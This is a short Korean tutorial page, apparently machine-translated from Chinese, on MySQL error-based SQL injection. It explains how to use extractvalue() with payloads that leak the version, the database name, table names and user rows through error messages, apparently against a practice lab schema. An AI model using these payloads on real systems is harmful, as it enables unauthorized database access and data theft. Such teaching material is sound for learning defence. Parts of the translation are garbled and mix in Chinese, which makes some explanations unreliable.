mysql에서 오류 주입이란 페이지에 보고된 오류 정보를 통해 원하는 데이터를 얻기 위해 적절한 명령문을 구성하는 것을 의미하며, 응용 시스템이 데이터베이스 오류 함수를 종료하지 않는 경우 extractvalue() 함수를 사용하여 정보를 반환할 수 있습니다. 대상 XML에 포함된 쿼리 값의 문자열입니다.
이 튜토리얼의 운영 환경: windows10 시스템, mysql8.0.22 버전, Dell G3 컴퓨터.
오류 주입은 일종의 블라인드 주입이라고도 할 수 있습니다------정보가 오류 프롬프트를 통해 에코되도록 페이로드를 구성합니다. 공동 쿼리가 명확한 위치를 밝힐 수 없는 경우 오류 주입 사용을 고려할 수 있습니다.
그렇다면 오류 주입은 어떻게 형성되나요?
첫째, 애플리케이션 시스템이 데이터베이스 오류 보고 기능을 닫지 않았습니다. 일부 SQL 문 오류의 경우 페이지에 직접 표시되고 일부는 데이터베이스 이름과 테이블 이름을 직접 유출하기도 합니다. 백그라운드가 MySQL에 응답하지 않는 것이 중요합니다. 오류 보고 기능 필터링
2. 오류 보고에 일반적으로 사용되는 함수
EXTRACTVALUE (XML_document, XPath_string) : 첫 번째 매개변수: XML_document는 XML 문서 객체의 이름인 문자열 형식입니다. 두 번째 매개변수: 및 extractvalue(1,concat(0x7e,(select @@version)) ,0x7e))--+. 그 중 concat은 concatenation()의 매개변수이고, 0x7e는 디코딩 후 ~ 기호이다. ---+는 주석 문자입니다. 오류를 방지하려면 소스 코드의 모든 후속 명령문을 주석 처리하세요. 테스트 후 결과는 다음과 같습니다.
//concat 앞의 1은 extractvalue() 함수의 첫 번째 매개변수이며 임의의 숫자로 대체 가능
2. 데이터베이스 이름 가져오기
문 사용
1‘ and extractvalue(1,concat(0x7e,(select database()),0x7e))--+,
3. 테이블 이름 가져오기
1’ and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e))--+. 其中group_concat将tale_name字段的所有行放在一行上显示出来,如下所示
4. 데이터 가져오기
1' and extractvalue(1,concat(0x7e,(select * from (select username from users limit 0,1) as a),0x7e))--+. 修改其中的limit参数即可获取users表中的不同行内容
추천 학습:
mysql 동영상 튜토리얼위 내용은 mysql 오류 주입이란 무엇입니까?의 상세 내용입니다. 자세한 내용은 PHP 중국어 웹사이트의 기타 관련 기사를 참조하세요!
![[웹 프런트엔드] Node.js 빠른 시작](https://img.php.cn/upload/course/000/000/067/662b5d34ba7c0227.png)
